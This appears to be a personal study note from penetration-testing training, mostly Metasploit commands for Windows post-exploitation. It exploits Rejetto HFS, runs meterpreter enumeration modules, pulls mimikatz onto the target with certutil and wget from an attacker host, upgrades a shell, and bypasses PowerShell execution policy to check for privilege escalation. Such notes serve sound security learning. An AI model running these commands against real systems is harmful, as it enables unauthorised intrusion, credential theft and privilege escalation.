Post Exploitation Overview
Post Exploitation Overview
Navigation
Sections in This Note
- Windows Post Exploitation
- Transfer Files To and From Target
- Upgrading Shell
- Enumerating System Information
Windows Post Exploitation
MSF provides post-exploitation modules for enumerating info about a Windows system:
- Enumerate user privileges
- Enumerate logged-on users
- VM check
- Enumerate installed programs
- Enumerate AVs
- Enumerate computers connected to domain
- Enumerate installed patches
- Enumerate shares
service postgresql start
msfconsole
workspace -a windows_post
setg RHOSTS (IPaddress)
db_nmap -sV (IPaddress)
# (consider the target has rejetto vuln)
use exploit/windows/http/rejetto_hfs_exec
run
Additional commands after getting the meterpreter:
help # additional commands
screenshot # takes screenshot, saves in PWD
getuid
show_mount # shows storage details
ps # process list
use post/windows/manage/migrate # migrate to a session
Post exploitation modules:
use post/windows/gather/win_privs
set SESSION 1
run
# (shows what privileges we have and don't)
use post/windows/gather/enum_logged_on_users
set session 1
run
# (list currently logged on users and previously logged in users)
use post/windows/gather/checkvm
set SESSION 1
run
# (check whether the target is running in a virtual machine)
use post/windows/gather/enum_applications
set SESSION 1
run
# (list applications and programs on the target machine)
use post/windows/gather/enum_av_excluded
set SESSION 1
run
# (list the antivirus specified on the target)
Transfer Files To and From Target
# Python 2
python -m SimpleHTTPServer 80
# Python 3
python3 -m http.server 80
# Windows
certutil -urlcache -f http://mimikatz.exe mimikatz.exe
# Linux
wget http://192.196.45.2/test.txt
Upgrading Shell
/bin/bash -i
python -c 'import pty; pty.spawn("/bin/bash")'
Enumerating System Information
getuid
sysinfo
shell # to open a shell
hostname
systeminfo
Related
Migrated from Unsorted Notes — Enumerating Users and Groups
Enumerating Users and Groups
msfconsole
use post/windows/gather/enum_logged_on_users
set session 1
run
Migrated from Unsorted Notes — Enumerating Network Info
Enumerating Network Info
ipconfig
netstat -aon # services running
netsh firewall show state
Migrated from Unsorted Notes — Identify Privilege Escalation Vulnerabilities
Identify Privilege Escalation Vulnerabilities
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"